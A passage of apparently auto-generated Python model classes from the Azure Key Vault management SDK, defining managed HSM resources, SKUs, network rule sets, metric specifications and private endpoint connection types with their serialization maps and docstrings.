self.location = location
self.sku = sku
self.tags = tags
self.system_data = None
class ManagedHsm(ManagedHsmResource):
"""Resource information with extended details.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The Azure Resource Manager resource ID for the managed HSM Pool.
:vartype id: str
:ivar name: The name of the managed HSM Pool.
:vartype name: str
:ivar type: The resource type of the managed HSM Pool.
:vartype type: str
:ivar location: The supported Azure location where the managed HSM Pool should be created.
:vartype location: str
:ivar sku: SKU details.
:vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar system_data: Metadata pertaining to creation and last modification of the key vault
resource.
:vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
:ivar properties: Properties of the managed HSM.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmProperties
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"sku": {"key": "sku", "type": "ManagedHsmSku"},
"tags": {"key": "tags", "type": "{str}"},
"system_data": {"key": "systemData", "type": "SystemData"},
"properties": {"key": "properties", "type": "ManagedHsmProperties"},
}
def __init__(
self,
*,
location: Optional[str] = None,
sku: Optional["_models.ManagedHsmSku"] = None,
tags: Optional[Dict[str, str]] = None,
properties: Optional["_models.ManagedHsmProperties"] = None,
**kwargs: Any
) -> None:
"""
:keyword location: The supported Azure location where the managed HSM Pool should be created.
:paramtype location: str
:keyword sku: SKU details.
:paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
:keyword properties: Properties of the managed HSM.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmProperties
"""
super().__init__(location=location, sku=sku, tags=tags, **kwargs)
self.properties = properties
class ManagedHsmError(_serialization.Model):
"""The error exception.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar error: The server error.
:vartype error: ~azure.mgmt.keyvault.v2021_10_01.models.Error
"""
_validation = {
"error": {"readonly": True},
}
_attribute_map = {
"error": {"key": "error", "type": "Error"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.error = None
class ManagedHsmListResult(_serialization.Model):
"""List of managed HSM Pools.
:ivar value: The list of managed HSM Pools.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsm]
:ivar next_link: The URL to get the next set of managed HSM Pools.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[ManagedHsm]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self, *, value: Optional[List["_models.ManagedHsm"]] = None, next_link: Optional[str] = None, **kwargs: Any
) -> None:
"""
:keyword value: The list of managed HSM Pools.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsm]
:keyword next_link: The URL to get the next set of managed HSM Pools.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class ManagedHsmProperties(_serialization.Model): # pylint: disable=too-many-instance-attributes
"""Properties of the managed HSM Pool.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the managed HSM pool.
:vartype tenant_id: str
:ivar initial_admin_object_ids: Array of initial administrators object ids for this managed hsm
pool.
:vartype initial_admin_object_ids: list[str]
:ivar hsm_uri: The URI of the managed hsm pool for performing operations on keys.
:vartype hsm_uri: str
:ivar enable_soft_delete: Property to specify whether the 'soft delete' functionality is
enabled for this managed HSM pool. Soft delete is enabled by default for all managed HSMs and
is immutable.
:vartype enable_soft_delete: bool
:ivar soft_delete_retention_in_days: Soft deleted data retention days. When you delete an HSM
or a key, it will remain recoverable for the configured retention period or for a default
period of 90 days. It accepts values between 7 and 90.
:vartype soft_delete_retention_in_days: int
:ivar enable_purge_protection: Property specifying whether protection against purge is enabled
for this managed HSM pool. Setting this property to true activates protection against purge for
this managed HSM pool and its content - only the Managed HSM service may initiate a hard,
irrecoverable deletion. Enabling this functionality is irreversible.
:vartype enable_purge_protection: bool
:ivar create_mode: The create mode to indicate whether the resource is being created or is
being recovered from a deleted resource. Known values are: "recover" and "default".
:vartype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
:ivar status_message: Resource Status Message.
:vartype status_message: str
:ivar provisioning_state: Provisioning state. Known values are: "Succeeded", "Provisioning",
"Failed", "Updating", "Deleting", "Activated", "SecurityDomainRestore", and "Restoring".
:vartype provisioning_state: str or ~azure.mgmt.keyvault.v2021_10_01.models.ProvisioningState
:ivar network_acls: Rules governing the accessibility of the key vault from specific network
locations.
:vartype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMNetworkRuleSet
:ivar private_endpoint_connections: List of private endpoint connections associated with the
managed hsm pool.
:vartype private_endpoint_connections:
list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnectionItem]
:ivar public_network_access: Control permission to the managed HSM from public networks. Known
values are: "Enabled" and "Disabled".
:vartype public_network_access: str or
~azure.mgmt.keyvault.v2021_10_01.models.PublicNetworkAccess
:ivar scheduled_purge_date: The scheduled purge date in UTC.
:vartype scheduled_purge_date: ~datetime.datetime
"""
_validation = {
"hsm_uri": {"readonly": True},
"status_message": {"readonly": True},
"provisioning_state": {"readonly": True},
"private_endpoint_connections": {"readonly": True},
"scheduled_purge_date": {"readonly": True},
}
_attribute_map = {
"tenant_id": {"key": "tenantId", "type": "str"},
"initial_admin_object_ids": {"key": "initialAdminObjectIds", "type": "[str]"},
"hsm_uri": {"key": "hsmUri", "type": "str"},
"enable_soft_delete": {"key": "enableSoftDelete", "type": "bool"},
"soft_delete_retention_in_days": {"key": "softDeleteRetentionInDays", "type": "int"},
"enable_purge_protection": {"key": "enablePurgeProtection", "type": "bool"},
"create_mode": {"key": "createMode", "type": "str"},
"status_message": {"key": "statusMessage", "type": "str"},
"provisioning_state": {"key": "provisioningState", "type": "str"},
"network_acls": {"key": "networkAcls", "type": "MHSMNetworkRuleSet"},
"private_endpoint_connections": {
"key": "privateEndpointConnections",
"type": "[MHSMPrivateEndpointConnectionItem]",
},
"public_network_access": {"key": "publicNetworkAccess", "type": "str"},
"scheduled_purge_date": {"key": "scheduledPurgeDate", "type": "iso-8601"},
}
def __init__(
self,
*,
tenant_id: Optional[str] = None,
initial_admin_object_ids: Optional[List[str]] = None,
enable_soft_delete: bool = True,
soft_delete_retention_in_days: int = 90,
enable_purge_protection: bool = True,
create_mode: Optional[Union[str, "_models.CreateMode"]] = None,
network_acls: Optional["_models.MHSMNetworkRuleSet"] = None,
public_network_access: Union[str, "_models.PublicNetworkAccess"] = "Enabled",
**kwargs: Any
) -> None:
"""
:keyword tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the managed HSM pool.
:paramtype tenant_id: str
:keyword initial_admin_object_ids: Array of initial administrators object ids for this managed
hsm pool.
:paramtype initial_admin_object_ids: list[str]
:keyword enable_soft_delete: Property to specify whether the 'soft delete' functionality is
enabled for this managed HSM pool. Soft delete is enabled by default for all managed HSMs and
is immutable.
:paramtype enable_soft_delete: bool
:keyword soft_delete_retention_in_days: Soft deleted data retention days. When you delete an
HSM or a key, it will remain recoverable for the configured retention period or for a default
period of 90 days. It accepts values between 7 and 90.
:paramtype soft_delete_retention_in_days: int
:keyword enable_purge_protection: Property specifying whether protection against purge is
enabled for this managed HSM pool. Setting this property to true activates protection against
purge for this managed HSM pool and its content - only the Managed HSM service may initiate a
hard, irrecoverable deletion. Enabling this functionality is irreversible.
:paramtype enable_purge_protection: bool
:keyword create_mode: The create mode to indicate whether the resource is being created or is
being recovered from a deleted resource. Known values are: "recover" and "default".
:paramtype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
:keyword network_acls: Rules governing the accessibility of the key vault from specific network
locations.
:paramtype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMNetworkRuleSet
:keyword public_network_access: Control permission to the managed HSM from public networks.
Known values are: "Enabled" and "Disabled".
:paramtype public_network_access: str or
~azure.mgmt.keyvault.v2021_10_01.models.PublicNetworkAccess
"""
super().__init__(**kwargs)
self.tenant_id = tenant_id
self.initial_admin_object_ids = initial_admin_object_ids
self.hsm_uri = None
self.enable_soft_delete = enable_soft_delete
self.soft_delete_retention_in_days = soft_delete_retention_in_days
self.enable_purge_protection = enable_purge_protection
self.create_mode = create_mode
self.status_message = None
self.provisioning_state = None
self.network_acls = network_acls
self.private_endpoint_connections = None
self.public_network_access = public_network_access
self.scheduled_purge_date = None
class ManagedHsmSku(_serialization.Model):
"""SKU details.
All required parameters must be populated in order to send to Azure.
:ivar family: SKU Family of the managed HSM Pool. Required. "B"
:vartype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuFamily
:ivar name: SKU of the managed HSM Pool. Required. Known values are: "Standard_B1",
"Custom_B32", and "Custom_B6".
:vartype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuName
"""
_validation = {
"family": {"required": True},
"name": {"required": True},
}
_attribute_map = {
"family": {"key": "family", "type": "str"},
"name": {"key": "name", "type": "str"},
}
def __init__(
self,
*,
family: Union[str, "_models.ManagedHsmSkuFamily"],
name: Union[str, "_models.ManagedHsmSkuName"],
**kwargs: Any
) -> None:
"""
:keyword family: SKU Family of the managed HSM Pool. Required. "B"
:paramtype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuFamily
:keyword name: SKU of the managed HSM Pool. Required. Known values are: "Standard_B1",
"Custom_B32", and "Custom_B6".
:paramtype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuName
"""
super().__init__(**kwargs)
self.family = family
self.name = name
class MetricSpecification(_serialization.Model): # pylint: disable=too-many-instance-attributes
"""Metric specification of operation.
:ivar name: Name of metric specification.
:vartype name: str
:ivar display_name: Display name of metric specification.
:vartype display_name: str
:ivar display_description: Display description of metric specification.
:vartype display_description: str
:ivar unit: The metric unit. Possible values include: 'Bytes', 'Count', 'Milliseconds'.
:vartype unit: str
:ivar aggregation_type: The metric aggregation type. Possible values include: 'Average',
'Count', 'Total'.
:vartype aggregation_type: str
:ivar supported_aggregation_types: The supported aggregation types for the metrics.
:vartype supported_aggregation_types: list[str]
:ivar supported_time_grain_types: The supported time grain types for the metrics.
:vartype supported_time_grain_types: list[str]
:ivar lock_aggregation_type: The metric lock aggregation type.
:vartype lock_aggregation_type: str
:ivar dimensions: The dimensions of metric.
:vartype dimensions: list[~azure.mgmt.keyvault.v2021_10_01.models.DimensionProperties]
:ivar fill_gap_with_zero: Property to specify whether to fill gap with zero.
:vartype fill_gap_with_zero: bool
:ivar internal_metric_name: The internal metric name.
:vartype internal_metric_name: str
"""
_attribute_map = {
"name": {"key": "name", "type": "str"},
"display_name": {"key": "displayName", "type": "str"},
"display_description": {"key": "displayDescription", "type": "str"},
"unit": {"key": "unit", "type": "str"},
"aggregation_type": {"key": "aggregationType", "type": "str"},
"supported_aggregation_types": {"key": "supportedAggregationTypes", "type": "[str]"},
"supported_time_grain_types": {"key": "supportedTimeGrainTypes", "type": "[str]"},
"lock_aggregation_type": {"key": "lockAggregationType", "type": "str"},
"dimensions": {"key": "dimensions", "type": "[DimensionProperties]"},
"fill_gap_with_zero": {"key": "fillGapWithZero", "type": "bool"},
"internal_metric_name": {"key": "internalMetricName", "type": "str"},
}
def __init__(
self,
*,
name: Optional[str] = None,
display_name: Optional[str] = None,
display_description: Optional[str] = None,
unit: Optional[str] = None,
aggregation_type: Optional[str] = None,
supported_aggregation_types: Optional[List[str]] = None,
supported_time_grain_types: Optional[List[str]] = None,
lock_aggregation_type: Optional[str] = None,
dimensions: Optional[List["_models.DimensionProperties"]] = None,
fill_gap_with_zero: Optional[bool] = None,
internal_metric_name: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword name: Name of metric specification.
:paramtype name: str
:keyword display_name: Display name of metric specification.
:paramtype display_name: str
:keyword display_description: Display description of metric specification.
:paramtype display_description: str
:keyword unit: The metric unit. Possible values include: 'Bytes', 'Count', 'Milliseconds'.
:paramtype unit: str
:keyword aggregation_type: The metric aggregation type. Possible values include: 'Average',
'Count', 'Total'.
:paramtype aggregation_type: str
:keyword supported_aggregation_types: The supported aggregation types for the metrics.
:paramtype supported_aggregation_types: list[str]
:keyword supported_time_grain_types: The supported time grain types for the metrics.
:paramtype supported_time_grain_types: list[str]
:keyword lock_aggregation_type: The metric lock aggregation type.
:paramtype lock_aggregation_type: str
:keyword dimensions: The dimensions of metric.
:paramtype dimensions: list[~azure.mgmt.keyvault.v2021_10_01.models.DimensionProperties]
:keyword fill_gap_with_zero: Property to specify whether to fill gap with zero.
:paramtype fill_gap_with_zero: bool
:keyword internal_metric_name: The internal metric name.
:paramtype internal_metric_name: str
"""
super().__init__(**kwargs)
self.name = name
self.display_name = display_name
self.display_description = display_description
self.unit = unit
self.aggregation_type = aggregation_type
self.supported_aggregation_types = supported_aggregation_types
self.supported_time_grain_types = supported_time_grain_types
self.lock_aggregation_type = lock_aggregation_type
self.dimensions = dimensions
self.fill_gap_with_zero = fill_gap_with_zero
self.internal_metric_name = internal_metric_name
class MHSMIPRule(_serialization.Model):
"""A rule governing the accessibility of a managed hsm pool from a specific ip address or ip
range.
All required parameters must be populated in order to send to Azure.
:ivar value: An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP address)
or '124.56.78.0/24' (all addresses that start with 124.56.78). Required.
:vartype value: str
"""
_validation = {
"value": {"required": True},
}
_attribute_map = {
"value": {"key": "value", "type": "str"},
}
def __init__(self, *, value: str, **kwargs: Any) -> None:
"""
:keyword value: An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP
address) or '124.56.78.0/24' (all addresses that start with 124.56.78). Required.
:paramtype value: str
"""
super().__init__(**kwargs)
self.value = value
class MHSMNetworkRuleSet(_serialization.Model):
"""A set of rules governing the network accessibility of a managed hsm pool.
:ivar bypass: Tells what traffic can bypass network rules. This can be 'AzureServices' or
'None'. If not specified the default is 'AzureServices'. Known values are: "AzureServices" and
"None".
:vartype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
:ivar default_action: The default action when no rule from ipRules and from virtualNetworkRules
match. This is only used after the bypass property has been evaluated. Known values are:
"Allow" and "Deny".
:vartype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
:ivar ip_rules: The list of IP address rules.
:vartype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMIPRule]
:ivar virtual_network_rules: The list of virtual network rules.
:vartype virtual_network_rules:
list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMVirtualNetworkRule]
"""
_attribute_map = {
"bypass": {"key": "bypass", "type": "str"},
"default_action": {"key": "defaultAction", "type": "str"},
"ip_rules": {"key": "ipRules", "type": "[MHSMIPRule]"},
"virtual_network_rules": {"key": "virtualNetworkRules", "type": "[MHSMVirtualNetworkRule]"},
}
def __init__(
self,
*,
bypass: Optional[Union[str, "_models.NetworkRuleBypassOptions"]] = None,
default_action: Optional[Union[str, "_models.NetworkRuleAction"]] = None,
ip_rules: Optional[List["_models.MHSMIPRule"]] = None,
virtual_network_rules: Optional[List["_models.MHSMVirtualNetworkRule"]] = None,
**kwargs: Any
) -> None:
"""
:keyword bypass: Tells what traffic can bypass network rules. This can be 'AzureServices' or
'None'. If not specified the default is 'AzureServices'. Known values are: "AzureServices" and
"None".
:paramtype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
:keyword default_action: The default action when no rule from ipRules and from
virtualNetworkRules match. This is only used after the bypass property has been evaluated.
Known values are: "Allow" and "Deny".
:paramtype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
:keyword ip_rules: The list of IP address rules.
:paramtype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMIPRule]
:keyword virtual_network_rules: The list of virtual network rules.
:paramtype virtual_network_rules:
list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMVirtualNetworkRule]
"""
super().__init__(**kwargs)
self.bypass = bypass
self.default_action = default_action
self.ip_rules = ip_rules
self.virtual_network_rules = virtual_network_rules
class MHSMPrivateEndpoint(_serialization.Model):
"""Private endpoint object properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Full identifier of the private endpoint resource.
:vartype id: str
"""
_validation = {
"id": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.id = None
class MHSMPrivateEndpointConnection(ManagedHsmResource): # pylint: disable=too-many-instance-attributes
"""Private endpoint connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The Azure Resource Manager resource ID for the managed HSM Pool.
:vartype id: str
:ivar name: The name of the managed HSM Pool.
:vartype name: str
:ivar type: The resource type of the managed HSM Pool.
:vartype type: str
:ivar location: The supported Azure location where the managed HSM Pool should be created.
:vartype location: str
:ivar sku: SKU details.
:vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar system_data: Metadata pertaining to creation and last modification of the key vault
resource.
:vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
:ivar etag: Modified whenever there is a change in the state of private endpoint connection.
:vartype etag: str
:ivar private_endpoint: Properties of the private endpoint object.
:vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
:ivar private_link_service_connection_state: Approval state of the private link connection.
:vartype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
:ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:vartype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"sku": {"key": "sku", "type": "ManagedHsmSku"},
"tags": {"key": "tags", "type": "{str}"},
"system_data": {"key": "systemData", "type": "SystemData"},
"etag": {"key": "etag", "type": "str"},
"private_endpoint": {"key": "properties.privateEndpoint", "type": "MHSMPrivateEndpoint"},
"private_link_service_connection_state": {
"key": "properties.privateLinkServiceConnectionState",
"type": "MHSMPrivateLinkServiceConnectionState",
},
"provisioning_state": {"key": "properties.provisioningState", "type": "str"},
}
def __init__(
self,
*,
location: Optional[str] = None,
sku: Optional["_models.ManagedHsmSku"] = None,
tags: Optional[Dict[str, str]] = None,
etag: Optional[str] = None,
private_endpoint: Optional["_models.MHSMPrivateEndpoint"] = None,
private_link_service_connection_state: Optional["_models.MHSMPrivateLinkServiceConnectionState"] = None,
provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
**kwargs: Any
) -> None:
"""
:keyword location: The supported Azure location where the managed HSM Pool should be created.
:paramtype location: str
:keyword sku: SKU details.
:paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
:keyword etag: Modified whenever there is a change in the state of private endpoint connection.
:paramtype etag: str
:keyword private_endpoint: Properties of the private endpoint object.
:paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
:keyword private_link_service_connection_state: Approval state of the private link connection.
:paramtype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
:keyword provisioning_state: Provisioning state of the private endpoint connection. Known
values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:paramtype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
super().__init__(location=location, sku=sku, tags=tags, **kwargs)
self.etag = etag
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = provisioning_state
class MHSMPrivateEndpointConnectionItem(_serialization.Model):
"""Private endpoint connection item.
:ivar id: Id of private endpoint connection.
:vartype id: str
:ivar etag: Modified whenever there is a change in the state of private endpoint connection.
:vartype etag: str
:ivar private_endpoint: Properties of the private endpoint object.
:vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
:ivar private_link_service_connection_state: Approval state of the private link connection.
:vartype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
:ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:vartype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
_attribute_map = {
"id": {"key": "id", "type": "str"},
"etag": {"key": "etag", "type": "str"},
"private_endpoint": {"key": "properties.privateEndpoint", "type": "MHSMPrivateEndpoint"},
"private_link_service_connection_state": {
"key": "properties.privateLinkServiceConnectionState",
"type": "MHSMPrivateLinkServiceConnectionState",
},
"provisioning_state": {"key": "properties.provisioningState", "type": "str"},
}
def __init__(
self,
*,
id: Optional[str] = None, # pylint: disable=redefined-builtin
etag: Optional[str] = None,
private_endpoint: Optional["_models.MHSMPrivateEndpoint"] = None,
private_link_service_connection_state: Optional["_models.MHSMPrivateLinkServiceConnectionState"] = None,
provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
**kwargs: Any
) -> None:
"""
:keyword id: Id of private endpoint connection.
:paramtype id: str
:keyword etag: Modified whenever there is a change in the state of private endpoint connection.
:paramtype etag: str
:keyword private_endpoint: Properties of the private endpoint object.
:paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
:keyword private_link_service_connection_state: Approval state of the private link connection.
:paramtype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
:keyword provisioning_state: Provisioning state of the private endpoint connection. Known
values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:paramtype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
super().__init__(**kwargs)
self.id = id
self.etag = etag
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = provisioning_state
class MHSMPrivateEndpointConnectionsListResult(_serialization.Model):
"""List of private endpoint connections associated with a managed HSM Pools.
:ivar value: The private endpoint connection associated with a managed HSM Pools.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection]
:ivar next_link: The URL to get the next set of managed HSM Pools.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[MHSMPrivateEndpointConnection]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self,
*,
value: Optional[List["_models.MHSMPrivateEndpointConnection"]] = None,
next_link: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword value: The private endpoint connection associated with a managed HSM Pools.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection]
:keyword next_link: The URL to get the next set of managed HSM Pools.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class MHSMPrivateLinkResource(ManagedHsmResource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The Azure Resource Manager resource ID for the managed HSM Pool.
:vartype id: str
:ivar name: The name of the managed HSM Pool.
:vartype name: str
:ivar type: The resource type of the managed HSM Pool.
:vartype type: str
:ivar location: The supported Azure location where the managed HSM Pool should be created.
:vartype location: str
:ivar sku: SKU details.
:vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar system_data: Metadata pertaining to creation and last modification of the key vault
resource.
:vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
:ivar group_id: Group identifier of private link resource.
:vartype group_id: str
:ivar required_members: Required member names of private link resource.
:vartype required_members: list[str]
:ivar required_zone_names: Required DNS zone names of the the private link resource.
:vartype required_zone_names: list[str]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
"group_id": {"readonly": True},
"required_members": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"sku": {"key": "sku", "type": "ManagedHsmSku"},
"tags": {"key": "tags", "type": "{str}"},
"system_data": {"key": "systemData", "type": "SystemData"},
"group_id": {"key": "properties.groupId", "type": "str"},
"required_members": {"key": "properties.requiredMembers", "type": "[str]"},
"required_zone_names": {"key": "properties.requiredZoneNames", "type": "[str]"},
}
def __init__(
self,
*,
location: Optional[str] = None,
sku: Optional["_models.ManagedHsmSku"] = None,
tags: Optional[Dict[str, str]] = None,
required_zone_names: Optional[List[str]] = None,
**kwargs: Any
) -> None:
"""
:keyword location: The supported Azure location where the managed HSM Pool should be created.
:paramtype location: str
:keyword sku: SKU details.
:paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
:keyword required_zone_names: Required DNS zone names of the the private link resource.
:paramtype required_zone_names: list[str]
"""
super().__init__(location=location, sku=sku, tags=tags, **kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = required_zone_names
class MHSMPrivateLinkResourceListResult(_serialization.Model):
"""A list of private link resources.
:ivar value: Array of private link resources.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkResource]
"""
_attribute_map = {
"value": {"key": "value", "type": "[MHSMPrivateLinkResource]"},
}
def __init__(self, *, value: Optional[List["_models.MHSMPrivateLinkResource"]] = None, **kwargs: Any) -> None:
"""
:keyword value: Array of private link resources.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkResource]
"""
super().__init__(**kwargs)
self.value = value
class MHSMPrivateLinkServiceConnectionState(_serialization.Model):
"""An object that represents the approval state of the private link connection.
:ivar status: Indicates whether the connection has been approved, rejected or removed by the
key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
:vartype status: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
:ivar description: The reason for approval or rejection.
:vartype description: str
:ivar actions_required: A message indicating if changes on the service provider require any
updates on the consumer. "None"
:vartype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
"""
_attribute_map = {
"status": {"key": "status", "type": "str"},
"description": {"key": "description", "type": "str"},
"actions_required": {"key": "actionsRequired", "type": "str"},
}
def __init__(
self,
*,
status: Optional[Union[str, "_models.PrivateEndpointServiceConnectionStatus"]] = None,
description: Optional[str] = None,
actions_required: Optional[Union[str, "_models.ActionsRequired"]] = None,
**kwargs: Any
) -> None:
"""
:keyword status: Indicates whether the connection has been approved, rejected or removed by the
key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
:paramtype status: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
:keyword description: The reason for approval or rejection.
:paramtype description: str
:keyword actions_required: A message indicating if changes on the service provider require any
updates on the consumer. "None"
:paramtype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
"""
super().__init__(**kwargs)
self.status = status
self.description = description
self.actions_required = actions_required
class MHSMVirtualNetworkRule(_serialization.Model):
"""A rule governing the accessibility of a managed hsm pool from a specific virtual network.
All required parameters must be populated in order to send to Azure.
:ivar id: Full resource id of a vnet subnet, such as
'/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
Required.
:vartype id: str
"""
_validation = {
"id": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
}
def __init__(self, *, id: str, **kwargs: Any) -> None: # pylint: disable=redefined-builtin
"""
:keyword id: Full resource id of a vnet subnet, such as
'/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
Required.
:paramtype id: str
"""
super().__init__(**kwargs)
self.id = id
class NetworkRuleSet(_serialization.Model):
"""A set of rules governing the network accessibility of a vault.
:ivar bypass: Tells what traffic can bypass network rules. This can be 'AzureServices' or
'None'. If not specified the default is 'AzureServices'. Known values are: "AzureServices" and
"None".
:vartype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
:ivar default_action: The default action when no rule from ipRules and from virtualNetworkRules
match. This is only used after the bypass property has been evaluated. Known values are:
"Allow" and "Deny".
:vartype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
:ivar ip_rules: The list of IP address rules.
:vartype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.IPRule]
:ivar virtual_network_rules: The list of virtual network rules.
:vartype virtual_network_rules:
list[~azure.mgmt.keyvault.v2021_10_01.models.VirtualNetworkRule]
"""
_attribute_map = {
